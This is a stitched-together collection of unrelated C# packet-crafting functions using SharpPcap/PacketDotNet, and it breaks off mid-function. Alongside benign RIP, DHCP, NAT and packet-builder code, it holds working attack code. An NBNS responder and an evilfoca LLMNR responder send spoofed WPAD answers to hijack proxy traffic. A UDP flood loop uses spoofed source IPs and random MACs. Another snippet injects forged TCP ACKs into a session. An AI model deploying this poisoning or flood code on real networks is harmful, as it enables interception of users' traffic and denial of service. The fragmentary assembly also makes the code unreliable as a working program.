/// <summary>
/// Fires off on a seperate thread when a packet is available
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void ProcessPacket(RawCapture incoming)
{
try
{
Packet packet = Packet.ParsePacket(LinkLayers.Ethernet, incoming.Data);
EthernetPacket ethSrc = (EthernetPacket)packet.Extract(typeof(EthernetPacket));
IPv4Packet ipSrc = (IPv4Packet)packet.Extract(typeof(IPv4Packet));
if (ipSrc.Protocol == IPProtocolType.UDP)
{
UdpPacket udpSrc = (UdpPacket)packet.Extract(typeof(UdpPacket));
// From RFC 1002 Section 4.2.1.1
// Need to grab the transaction id for the reply
UInt16 namedTrnId = BitConverter.ToUInt16(udpSrc.PayloadData, 0);
// Looking for Response = query(0), OpCode = Query(0)
// 11000000 00000000
UInt16 flags = Utility.ReverseUInt16(BitConverter.ToUInt16(udpSrc.PayloadData, 2));
if ((flags & 0xc000) == 0)
{
// Grab the name and make sure it's WPAD
string name = Encoding.Default.GetString(udpSrc.PayloadData, 12, 34);
if (Utility.DecodeName(name) == WpadHostName)
{
Logger.AddToInfoView("Received NBNS query for {0} from {1}", WpadHostName, ethSrc.SourceHwAddress);
UdpPacket udpDst = new UdpPacket(NetbiosPort, NetbiosPort);
udpDst.PayloadData = SetupResponse(namedTrnId, GetDeviceIp(this.Device));
IPv4Packet ipDst = new IPv4Packet(GetDeviceIp(this.Device), ipSrc.SourceAddress);
ipDst.PayloadPacket = udpDst;
udpDst.UpdateCalculatedValues();
udpDst.UpdateUDPChecksum();
ipDst.UpdateCalculatedValues();
ipDst.UpdateIPChecksum();
EthernetPacket ethDst = new EthernetPacket(this.Device.MacAddress, ethSrc.SourceHwAddress, EthernetPacketType.IpV4);
ethDst.PayloadPacket = ipDst;
ethDst.UpdateCalculatedValues();
Logger.AddToInfoView("Sending poisoned response for {0}", WpadHostName);
this.Device.SendPacket(ethDst.Bytes);
}
}
}
else if (ipSrc.Protocol == IPProtocolType.TCP)
{
TcpPacket tcpSrc = (TcpPacket)packet.Extract(typeof(TcpPacket));
if (tcpSrc.Syn)
{
Logger.AddToInfoView("SYN sent {0}:{1}", ipSrc.DestinationAddress, tcpSrc.SourcePort);
}
}
}
catch (Exception ex)
{
Logger.AddToErrorView("OnPacketArrival", ex);
}
}
/// <summary>
/// 使用函数构造UDP数据包
/// </summary>
/// <param name="device"></param>
/// <param name="dst_mac"></param>
/// <param name="dst_ip"></param>
/// <param name="src_port"></param>
/// <param name="dst_port"></param>
/// <param name="send_data"></param>
/// <returns></returns>
private byte[] GenUDPPacket(PcapDevice device, PhysicalAddress dst_mac, IPAddress dst_ip, int src_port,
int dst_port, string send_data)
{
// 构造UDP部分数据报
UdpPacket udp_pkg = new UdpPacket((ushort)src_port, (ushort)dst_port);
udp_pkg.PayloadData = strToToHexByte(send_data);
udp_pkg.UpdateCalculatedValues();
// 构造IP部分数据报
IPv4Packet ip_pkg = new IPv4Packet(device.Interface.Addresses[1].Addr.ipAddress, dst_ip);
ip_pkg.Protocol = IPProtocolType.UDP;
ip_pkg.Version = IpVersion.IPv4;
ip_pkg.PayloadData = udp_pkg.Bytes;
ip_pkg.TimeToLive = 10;
ip_pkg.UpdateCalculatedValues();
ip_pkg.UpdateIPChecksum();
// 构造以太网帧
EthernetPacket net_pkg = new EthernetPacket(device.MacAddress, dst_mac, EthernetPacketType.IpV4);
net_pkg.Type = EthernetPacketType.IpV4;
net_pkg.PayloadData = ip_pkg.Bytes;
net_pkg.UpdateCalculatedValues();
return(net_pkg.Bytes);
}
public static Packet BuildPacket(int vlanID, EthernetPacket ePacket, IPv4Packet iPacket, UdpPacket uPacket, byte[] udpData)
{
uPacket.PayloadData = udpData;
iPacket.PayloadPacket = uPacket;
iPacket.UpdateIPChecksum();
uPacket.UpdateUDPChecksum();
return(BuildPacket(vlanID, ePacket, iPacket));
}
// IPv4 + TCP数据包封装函数
private EthernetPacket TcPonIPv4PacketMaker()
{
// Ether封包
var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)),
PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)),
EthernetPacketType.IPv4);
// TCP封包
var tcp = new TcpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text))
{
Urg = TCPFlagsCheckedListBox.GetItemChecked(0),
Ack = TCPFlagsCheckedListBox.GetItemChecked(1),
Psh = TCPFlagsCheckedListBox.GetItemChecked(2),
Rst = TCPFlagsCheckedListBox.GetItemChecked(3),
Syn = TCPFlagsCheckedListBox.GetItemChecked(4),
Fin = TCPFlagsCheckedListBox.GetItemChecked(5),
SequenceNumber = Convert.ToUInt32(SequenceTextBox.Text),
AcknowledgmentNumber = Convert.ToUInt32(AcknowledgmentTextBox.Text),
WindowSize = Convert.ToUInt16(WindowSizeTextBox.Text),
UrgentPointer = Convert.ToInt32(UrgPointerTextBox.Text)
};
if (PayloadTextBox.Text.Length != 0)
{
tcp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text);
}
tcp.UpdateCalculatedValues();
// IPv4封包
var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)),
IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text)))
{
TimeToLive = Convert.ToInt32(TTLTextBox.Text),
Protocol = IPProtocolType.TCP,
Version = IPVersion.IPv4,
FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text),
FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text),
TypeOfService = Convert.ToInt32(TOSTextBox.Text),
Id = Convert.ToUInt16(IdentifierTextbox.Text),
PayloadPacket = tcp
};
ether.PayloadPacket = IPv4;
IPv4.ParentPacket = ether;
IPv4.UpdateIPChecksum();
tcp.ParentPacket = IPv4;
tcp.UpdateTCPChecksum();
return(ether);
}
public Packet Build(EthernetPacket packet, UserSession session)
{
var mSrc = packet.SourceHardwareAddress;
var mDst = PhysicalAddress.Parse("00-19-C5-12-C5-C9");
var ipPacket = packet.Extract <IPPacket>();
if (ipPacket == null)
{
return(null);
}
var udpPacket = packet.Extract <UdpPacket>();
if (udpPacket == null)
{
return(null);
}
var src = IPAddress.Parse("10.253.0.1");
var dst = ipPacket.SourceAddress;
var newEthernetPacket = new EthernetPacket(mDst, mSrc, EthernetType.None);
var newIpPacket = new IPv4Packet(src, dst);
_payload[0x9d] = Convert.ToByte(_memoryContext.UserSession.Count());
var user = _userManager.Users.Where(u => u.Id == session.UserId).FirstOrDefault();
var newUdpPacket = new UdpPacket(udpPacket.DestinationPort, udpPacket.SourcePort);
newUdpPacket.PayloadData = InjectName(_payload, $"Welcome {user.UserName}!");
newUdpPacket.UpdateCalculatedValues();
newIpPacket.PayloadPacket = newUdpPacket;
newIpPacket.UpdateCalculatedValues();
newIpPacket.UpdateIPChecksum();
newEthernetPacket.PayloadPacket = newIpPacket;
//await clients.Client(session.ConnectionId).SendGamePacket(session, newEthernetPacket);
byte requestRegion = packet.Bytes[packet.Bytes.Length - 4];
session.Status = String.Format(UserStatus.AT_LOBBY, GetGameVersion(requestRegion));
_memoryContext.UserSession.Update(session);
_memoryContext.SaveChangesAsync().Wait();
return(newEthernetPacket);
}
private Packet GeneratePacket()
{
// FIXME in this case we always generate the same packet, but keep
// regenerating it -- this can be made more efficient!
var tcp_p = new TcpPacket(src_port, dst_port);
var ip_p = new IPv4Packet(src_ip, dst_ip);
var eth_p = new EthernetPacket(src_mac, dst_mac, EthernetPacketType.None);
eth_p.PayloadPacket = ip_p;
ip_p.PayloadPacket = tcp_p;
tcp_p.UpdateTCPChecksum();
ip_p.UpdateIPChecksum();
eth_p.UpdateCalculatedValues();
return(eth_p);
}
public static IPv4Packet CreateIpV4Packet(IPAddress sourceIpAddress, IPAddress destinationIpAddress,
TcpPacket payloadPacket)
{
var result = new IPv4Packet(sourceIpAddress, destinationIpAddress)
{
PayloadPacket = payloadPacket
};
payloadPacket.UpdateTCPChecksum();
result.UpdateIPChecksum();
result.UpdateCalculatedValues();
return(result);
}
public void GenerateLLMNRResponse(Packet packet)
{
try
{
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A)
{
WinPcapDevice dev = Program.CurrentProject.data.GetDevice();
IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev);
byte[] ipv4Addr = ip.GetAddressBytes();
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.A,
RData = ipv4Addr,
RDLength = (short)ipv4Addr.Length,
TTL = 12
});
llmnr.IsResponse = true;
EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4);
IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv4Dns.PayloadPacket = udpDns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv4Dns.UpdateIPChecksum();
ipv4Dns.UpdateCalculatedValues();
ethDns.PayloadPacket = ipv4Dns;
Program.CurrentProject.data.SendPacket(ethDns);
}
}
catch (Exception)
{
}
}
public void trigger_update(int cislo_rozhrania, Smerovaci_zaznam zaznam)
{
IPv4Packet ip_paket;
UdpPacket udp_paket;
Byte[] ip;
Byte[] hlava = new byte[] { 0x00, 0x02, 0x00, 0x00 };
Byte[] rip_hlava = new byte[] { 0x02, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00 };
Byte[] next_hop = new byte[] { 0x00, 0x00, 0x00, 0x00 };
Byte[] metrika = new byte[] { 0x00, 0x00, 0x00, 0x10 };
Rozhranie rozhranie;
if (cislo_rozhrania == 1)
{
rozhranie = rozhranie2;
}
else
{
rozhranie = rozhranie1;
}
EthernetPacket eth = new EthernetPacket(rozhranie.adapter.MacAddress, PhysicalAddress.Parse("01005E000009"), EthernetPacketType.IpV4);
ip_paket = new IPv4Packet(IPAddress.Parse(rozhranie.ip_adresa), IPAddress.Parse("224.0.0.9"));
ip_paket.TimeToLive = 2;
udp_paket = new UdpPacket(520, 520);
rip_hlava = rip_hlava.Concat(zaznam.cielova_siet.GetAddressBytes()).ToArray();
rip_hlava = rip_hlava.Concat(zaznam.maska.GetAddressBytes()).ToArray();
rip_hlava = rip_hlava.Concat(next_hop).ToArray();
rip_hlava = rip_hlava.Concat(metrika).ToArray();
udp_paket.PayloadData = rip_hlava;
// udp_paket.UpdateUDPChecksum();
ip_paket.PayloadPacket = udp_paket;
ip_paket.UpdateIPChecksum();
eth.PayloadPacket = ip_paket;
rozhranie.adapter.SendPacket(eth);
}
private void processUdpFlood(Object Params)
{
AttackParams _params = Params as AttackParams;
if (_params.UdpFloodEnabled)
{
NetworkInstruments.IpRandomizer IpSpoofer = new NetworkInstruments.IpRandomizer();
PhysicalAddress TargetMac = NetworkInstruments.ResolveMac(Adapter, _params.Target.Address);
ICaptureDevice ActiveDevice = NetworkInstruments.getActiveDevice(Adapter.GetPhysicalAddress());
ActiveDevice.Open();
UdpPacket udpPacket = new UdpPacket(0, 80);
IPv4Packet ipPacket = new IPv4Packet(IPAddress.Any, _params.Target.Address);
ipPacket.Protocol = IPProtocolType.UDP;
ipPacket.PayloadPacket = udpPacket;
if (TargetMac == null)
{
ErrorHandler(1, "Can not get MAC target address");
return;
}
; //unable to resolve mac
EthernetPacket ethernetPacket = new EthernetPacket(Adapter.GetPhysicalAddress(), TargetMac, EthernetPacketType.None);
ethernetPacket.PayloadPacket = ipPacket;
while (Attacking)
{
udpPacket.SourcePort = (ushort)Randomizer.Next(1, 49160);
udpPacket.DestinationPort = (ushort)Randomizer.Next(1, 49160);
udpPacket.PayloadData = new byte[Randomizer.Next(500)];
Randomizer.NextBytes(udpPacket.PayloadData);
udpPacket.UpdateCalculatedValues();
ipPacket.SourceAddress = IpSpoofer.GetNext(ref Randomizer, _params.RestrictedPool);
ipPacket.TimeToLive = Randomizer.Next(20, 128);
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
ethernetPacket.SourceHwAddress = NetworkInstruments.GetRandomMac(ref Randomizer);
ethernetPacket.UpdateCalculatedValues();
udpPacket.UpdateUDPChecksum();
ActiveDevice.SendPacket(ethernetPacket);
udpCounter++;
}
}
}
public static EthernetPacket CreateEthernetPacket(Interface sourceInterface, IEnumerable <Route> routes, IPAddress destination = null)
{
var ripPacket = new RipPacket(RipPacket.RipCommand.Response);
foreach (var route in routes.Where(item => (item.RipEnabled)))
{
ripPacket.Records.Add(new RipPacket.RipRecord(route));
}
var ipPacket = new IPv4Packet(sourceInterface.NetworkAddress, destination ?? IPAddress.Parse("224.0.0.9"))
{
PayloadPacket = ripPacket
};
ipPacket.UpdateIPChecksum();
return(new EthernetPacket(sourceInterface.MacAddress, PhysicalAddress.Parse("C2-01-0C-9C-00-01"),
EthernetType.IPv4)
{
PayloadPacket = ipPacket
});
}
// IPv4 + UDP数据包封装函数
private EthernetPacket UdPonIPv4PacketMaker()
{
// Ether封包
var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)),
PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)),
EthernetPacketType.IPv4);
// UDP封包
var udp = new UdpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text));
if (PayloadTextBox.Text.Length != 0)
{
udp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text);
}
udp.UpdateCalculatedValues();
// IPv4封包
var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)),
IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text)))
{
TimeToLive = Convert.ToInt32(TTLTextBox.Text),
Protocol = IPProtocolType.UDP,
Version = IPVersion.IPv4,
FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text),
FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text),
TypeOfService = Convert.ToInt32(TOSTextBox.Text),
Id = Convert.ToUInt16(IdentifierTextbox.Text),
PayloadPacket = udp
};
ether.PayloadPacket = IPv4;
IPv4.ParentPacket = ether;
IPv4.UpdateIPChecksum();
udp.ParentPacket = IPv4;
udp.UpdateUDPChecksum();
return(ether);
}
private void SendRequest()
{
try
{
m_IStatusUpdate.UpdateStatus("Assembling DHCP Request Packet");
DHCPRequest DhcpRequest = new DHCPRequest();
AssembleRequest(ref DhcpRequest);
string destHwAddress = "FFFFFFFFFFFF";
var dest = System.Net.NetworkInformation.PhysicalAddress.Parse(destHwAddress);
EthernetPacket packet = new EthernetPacket(m_Device.Interface.MacAddress, dest, EthernetPacketType.IpV4);
packet.Type = EthernetPacketType.IpV4;
var ipSourceAddress = System.Net.IPAddress.Parse("0.0.0.0");
var ipDestinationAddress = System.Net.IPAddress.Parse("255.255.255.255");
var ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress);
UdpPacket udpPacket = new UdpPacket(67, 68);
byte[] payload = StructureToByteArray(DhcpRequest);
ipPacket.Version = IpVersion.IPv4;
udpPacket.PayloadData = payload;
ipPacket.PayloadPacket = udpPacket;
packet.PayloadPacket = ipPacket;
udpPacket.UpdateUDPChecksum();
ipPacket.UpdateIPChecksum();
m_IStatusUpdate.UpdateStatus("Sending DHCP Discover");
m_Device.SendPacket(packet);
m_IStatusUpdate.UpdateStatus("Sent DHCP Discover");
}
catch (Exception)
{
m_IStatusUpdate.UpdateStatus("Failed to send DHCP Request");
}
}
/// <summary>
/// Create packet that would be replied to by this listener if correctly injected
/// </summary>
/// <param name="data"></param>
/// <returns></returns>
public Packet GetReceivablePacket(byte[] data)
{
var ipBytes = LocalIp.GetAddressBytes();
ipBytes[3]++;
var fakeIp = new IPAddress(ipBytes);
var fakeMac = PhysicalAddress.Parse("001122334455");
var eth = new EthernetPacket(fakeMac, BroadcastMac, EthernetType.IPv6);
var ip = new IPv4Packet(fakeIp, LocalIp);
var udp = new UdpPacket(Port, Port);
eth.PayloadPacket = ip;
ip.PayloadPacket = udp;
udp.PayloadData = data;
udp.UpdateCalculatedValues();
ip.UpdateCalculatedValues();
udp.UpdateUdpChecksum();
ip.UpdateIPChecksum();
return(eth);
}
void device_OnPacketArrival(object sender, CaptureEventArgs e)
{
var Now = DateTime.Now; // cache 'DateTime.Now' for minor reduction in cpu overhead
var interval = Now - _lastStatisticsOutput;
if (interval > _lastStatisticsInterval)
{
//Console.WriteLine("device_OnPacketArrival: " + e.Device.Statistics);
_captureStatistics = e.Device.Statistics;
_statisticsUiNeedsUpdate = true;
_lastStatisticsOutput = Now;
}
if (CaptureForm._pshPacket != null && _iRecvPackets <= RECEIVING_PACKED_EXPECTED)
{
Packet p = Packet.ParsePacket(e.Packet.LinkLayerType, e.Packet.Data);
TcpPacket tcp = TcpPacket.GetEncapsulated(p);
if (tcp.Psh && tcp.SourcePort == TARGET_PORT && tcp.PayloadData.Length > 0)
{
IPv4Packet ip = (IPv4Packet)IpPacket.GetEncapsulated(CaptureForm._pshPacket);
IPv4Packet lastAckIp = (IPv4Packet)IpPacket.GetEncapsulated(CaptureForm._lastAckPacket);
TcpPacket lastAckTcp = TcpPacket.GetEncapsulated(CaptureForm._lastAckPacket);
lastAckIp.Id = (ushort)(ip.Id + 10);
lastAckIp.UpdateIPChecksum();
lastAckTcp.SequenceNumber = tcp.AcknowledgmentNumber;
lastAckTcp.AcknowledgmentNumber = (uint)(tcp.SequenceNumber + tcp.PayloadData.Length);
lastAckTcp.UpdateTCPChecksum();
_device.SendPacket(CaptureForm._lastAckPacket);
CaptureForm._pshPacket = CaptureForm._lastAckPacket;
_iRecvPackets++;
}
}
lock (_queueLock)
_packetQueue.Add(e.Packet);
}
// LISTENS TO VPN ADAPTER AND SENDS THE SPECIFIC PACKETS OUT THE NORMAL ADAPTER
private static void TreatOUTPacketsVPNtoNormal(NdisApiDotNet outNdisapi, NetworkAdapter vpnAdapter, NetworkAdapter normalAdapter)
{
// Lists for re-injecting packets
List <RawPacket> toAdapter = new List <RawPacket>();
List <RawPacket> toMstcp = new List <RawPacket>();
// Unmanaged memory resource for sending receiving bulk of packets
// Maximum number of packets to send/receive = 64
NdisBufferResource buffer = new NdisBufferResource(64);
outNdisapi.SetAdapterMode(vpnAdapter.Handle, MSTCP_FLAGS.MSTCP_FLAG_TUNNEL);
outNdisapi.SetPacketEvent(vpnAdapter.Handle, outPacketEvent);
do
{
outPacketEvent.WaitOne();
var packetList = outNdisapi.ReadPackets(vpnAdapter.Handle, buffer);
while (packetList.Item1)
{
foreach (var packet in packetList.Item2)
{
Packet p = null;
EthernetPacket ethernetPacket = null;
TcpPacket tcpPacket = null;
IPv4Packet ipv4Packet = null;
ushort sport = 0;
ushort dport = 0;
try {
p = Packet.ParsePacket(LinkLayers.Ethernet, packet.Data);
ethernetPacket = (EthernetPacket)p;
tcpPacket = (TcpPacket)((IPPacket)((EthernetPacket)p).PayloadPacket).PayloadPacket;
ipv4Packet = (IPv4Packet)((EthernetPacket)p).PayloadPacket;
sport = tcpPacket.SourcePort;
dport = tcpPacket.DestinationPort;
} catch (Exception ex) {
if (packet.DeviceFlags == PACKET_FLAG.PACKET_FLAG_ON_RECEIVE)
{
toMstcp.Add(packet);
}
else
{
toAdapter.Add(packet);
}
Console.WriteLine($"An exeption {ex.Message} occured while trying to parse network packet. Packet will be let thru without any changes");
continue;
}
DumpSourceChangingFilteredPacket(packet.DeviceFlags,
ipv4Packet.SourceAddress.ToString(),
sport.ToString(),
ipv4Packet.DestinationAddress.ToString(),
dport.ToString(),
p.Bytes.Length,
packet.DeviceFlags == PACKET_FLAG.PACKET_FLAG_ON_RECEIVE);
if (packet.DeviceFlags == PACKET_FLAG.PACKET_FLAG_ON_RECEIVE)
{
// Packet was received on VPN adapter, leave it as it is
toMstcp.Add(packet);
}
else
{
if (ipv4Packet.SourceAddress.Equals(vpnIP))
{
// Change the Source for outgoing packets that will later be sent thru normal adapter
ipv4Packet.SourceAddress = localIp;
ethernetPacket.SourceHardwareAddress = localMacAddress;
ipv4Packet.UpdateIPChecksum();
tcpPacket.UpdateTcpChecksum();
ethernetPacket.UpdateCalculatedValues();
var newPackage = new RawPacket()
{
Data = p.Bytes,
FilterId = packet.FilterId,
Dot1q = packet.Dot1q,
NdisFlags = packet.NdisFlags,
DeviceFlags = packet.DeviceFlags
};
toAdapter.Add(newPackage);
}
else
{
toAdapter.Add(packet);
}
}
}
if (toMstcp.Count > 0)
{
// If we have packets to forward upwards the network stack then do it here
// RECEIVED SHOULD BE TREATED BY VPN ADAPTER
outNdisapi.SendPacketsToMstcp(vpnAdapter.Handle, buffer, toMstcp);
toMstcp.Clear();
}
if (toAdapter.Count > 0)
{
// If we have packets to forward downwards the network stack then do it here
// SENT SHOULD BE TREATED BY NORMAL ADAPTER
outNdisapi.SendPacketsToAdapter(normalAdapter.Handle, buffer, toAdapter);
toAdapter.Clear();
}
packetList = outNdisapi.ReadPackets(vpnAdapter.Handle, buffer);
}
;
outPacketEvent.Reset();
} while (!stopCapturing);
//
// Release driver and associated resources
//
buffer.Dispose();
outNdisapi.SetPacketEvent(vpnAdapter.Handle, null);
outNdisapi.SetAdapterMode(vpnAdapter.Handle, 0);
}
public void posli_update(Rozhranie rozhranie, int cislo_rozhrania, IPAddress cielova_ip, PhysicalAddress cielova_mac)
{
IPv4Packet ip_paket;
UdpPacket udp_paket;
Byte[] ip;
Byte[] hlava = new byte[] { 0x00, 0x02, 0x00, 0x00 };
Byte[] rip_hlava = new byte[] { 0x02, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00 };
Byte[] next_hop = new byte[] { 0x00, 0x00, 0x00, 0x00 };
Byte[] metrika = new byte[] { 0x00, 0x00, 0x00, 0x00 };
bool prvy = true;
EthernetPacket eth = new EthernetPacket(rozhranie.adapter.MacAddress, cielova_mac, EthernetPacketType.IpV4);
ip_paket = new IPv4Packet(IPAddress.Parse(rozhranie.ip_adresa), cielova_ip);
if (cielova_mac.ToString().Equals("01005E000009"))
{
ip_paket.TimeToLive = 2;
}
else
{
ip_paket.TimeToLive = 255;
}
udp_paket = new UdpPacket(520, 520);
foreach (var zaznam in smerovacia_tabulka.ToList())
{
if ((zaznam.typ == "D" || zaznam.typ == "R") && zaznam.exit_interface != cislo_rozhrania && zaznam.metrika != 16)
{
if (!prvy)
{
rip_hlava = rip_hlava.Concat(hlava).ToArray();
}
prvy = false;
rip_hlava = rip_hlava.Concat(zaznam.cielova_siet.GetAddressBytes()).ToArray();
rip_hlava = rip_hlava.Concat(zaznam.maska.GetAddressBytes()).ToArray();
rip_hlava = rip_hlava.Concat(next_hop).ToArray();
if (zaznam.metrika != 16)
{
metrika[3] = (byte)(zaznam.metrika + 1);
}
else
{
metrika[3] = (byte)(zaznam.metrika);
}
rip_hlava = rip_hlava.Concat(metrika).ToArray();
}
}
foreach (var zaznam in rip_databaza.ToList())
{
if (zaznam.metrika == 16 && zaznam.exit_interface != cislo_rozhrania)
{
if (!prvy)
{
rip_hlava = rip_hlava.Concat(hlava).ToArray();
}
prvy = false;
rip_hlava = rip_hlava.Concat(zaznam.cielova_siet.GetAddressBytes()).ToArray();
rip_hlava = rip_hlava.Concat(zaznam.maska.GetAddressBytes()).ToArray();
rip_hlava = rip_hlava.Concat(next_hop).ToArray();
metrika[3] = (byte)zaznam.metrika;
if (zaznam.metrika == 0)
{
metrika[3] = 1;
}
rip_hlava = rip_hlava.Concat(metrika).ToArray();
}
}
udp_paket.PayloadData = rip_hlava;
// udp_paket.UpdateUDPChecksum();
ip_paket.PayloadPacket = udp_paket;
ip_paket.UpdateIPChecksum();
eth.PayloadPacket = ip_paket;
rozhranie.adapter.SendPacket(eth);
}
public void posli_ping(string ip)
{
if (ip.Equals(rozhranie1.ip_adresa) || ip.Equals(rozhranie2.ip_adresa))
{
main_view.lbl_ping = "!!!!!";
}
else
{
string cmdString = "abcdefghijklmnoprstu";
byte[] sendBuffer = Encoding.ASCII.GetBytes(cmdString);
ICMPv4Packet ping = new ICMPv4Packet(new ByteArraySegment(sendBuffer));
string via = null;
Rozhranie rozhranie = null;
ping.Checksum = 0;
ping.TypeCode = ICMPv4TypeCodes.EchoRequest;
ping.Sequence = 1;
ping.UpdateCalculatedValues();
byte[] bytes = BitConverter.GetBytes(GetCrc(ping.Bytes));
Array.Reverse(bytes);
ushort result = BitConverter.ToUInt16(bytes, 0);
ping.Checksum = result;
Smerovaci_zaznam smerovaci_zaznam = najdi_zaznam_v_smerovacej_tabulke(IPAddress.Parse(ip));
if (smerovaci_zaznam != null && smerovaci_zaznam.exit_interface == -1)
{
smerovaci_zaznam = rekurzivne_prehladanie(smerovaci_zaznam, ref via);
}
if (smerovaci_zaznam != null && smerovaci_zaznam.exit_interface != -1 && smerovaci_zaznam.next_hop != "X")
{
via = smerovaci_zaznam.next_hop;
}
if (smerovaci_zaznam != null)
{
if (smerovaci_zaznam.exit_interface == 2)
{
rozhranie = rozhranie2;
}
if (smerovaci_zaznam.exit_interface == 1)
{
rozhranie = rozhranie1;
}
IPv4Packet ip_pak = new IPv4Packet(IPAddress.Parse(rozhranie1.ip_adresa), IPAddress.Parse(ip));
ip_pak.SourceAddress = IPAddress.Parse(rozhranie.ip_adresa);
ip_pak.DestinationAddress = IPAddress.Parse(ip);
ip_pak.PayloadPacket = ping;
ip_pak.UpdateIPChecksum();
string label = "";
EthernetPacket eth = new EthernetPacket(rozhranie.adapter.MacAddress, rozhranie.adapter.MacAddress, EthernetPacketType.IpV4);
eth.PayloadPacket = ip_pak;
int pokus = 5;
while (pokus-- > 0)
{
Thread posielanie = new Thread(() => preposli(rozhranie, eth, smerovaci_zaznam, via, IPAddress.Parse(ip)));
posielanie.Start();
zapis_ping = true;
Thread.Sleep(1000);
if (zapis_ping.Equals(true))
{
main_view.lbl_ping += "."; // main_view.lbl_ping = label;//main_view.vypis(".", 85);
}
}
}
else
{
main_view.lbl_ping = "neviem smerovat";
}
}
Thread.CurrentThread.Abort();
}
/*
* public EthernetPacketType deNAT_outgoing_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
* {
* EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
* if (!isIpOrArpPacket(ethernet_packet_type))
* return ethernet_packet_type;
* xbs_nat_entry nat_entry = null;
* lock (NAT_list)
* {
* if (NAT_list.ContainsKey(dstMAC))
* nat_entry = NAT_list[dstMAC];
* }
*
* if (nat_entry != null)
* {
* replaceDestinationIpWithOriginalIP(ref data, ethernet_packet_type, ref nat_entry);
* updateIPChecksums(ref data);
* }
* return ethernet_packet_type;
* }
*/
public EthernetPacketType deNAT_outgoing_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
{
EthernetPacket p = (EthernetPacket)EthernetPacket.ParsePacket(LinkLayers.Ethernet, data);
EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
IPv4Packet p_IPV4 = null;
ARPPacket p_ARP = null;
bool packet_changed = false;
if (ethernet_packet_type == EthernetPacketType.IpV4)
{
p_IPV4 = (IPv4Packet)p.PayloadPacket;
}
else if (ethernet_packet_type == EthernetPacketType.Arp)
{
p_ARP = (ARPPacket)p.PayloadPacket;
}
else
{
return(ethernet_packet_type);
}
xbs_nat_entry nat_entry = null;
lock (NAT_list)
{
if (dstMAC.Equals(broadcast_mac))
{
if (p_ARP != null)
{
foreach (xbs_nat_entry ne in NAT_list.Values)
{
if (ne.natted_source_ip.Equals(p_ARP.TargetProtocolAddress))
{
nat_entry = ne;
break;
}
}
}
}
else if (NAT_list.ContainsKey(dstMAC))
{
nat_entry = NAT_list[dstMAC];
}
}
#if DEBUG
if (nat_entry != null)
{
xbs_messages.addDebugMessage("% found device in deNAT list: " + dstMAC + " " + nat_entry.natted_source_ip + "=>" + nat_entry.original_source_ip, xbs_message_sender.NAT);
}
#endif
if (nat_entry != null)
{
if (p_IPV4 != null)
{
p_IPV4.DestinationAddress = nat_entry.original_source_ip;
p_IPV4.UpdateIPChecksum();
if (p_IPV4.Protocol == IPProtocolType.UDP)
{
UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket;
if (NAT_enablePS3mode)
{
bool ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.original_source_ip, nat_entry.natted_source_ip);
}
p_UDP.UpdateUDPChecksum();
packet_changed = true;
}
else if (p_IPV4.Protocol == IPProtocolType.TCP)
{
((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum();
packet_changed = true;
}
}
else if (p_ARP != null)
{
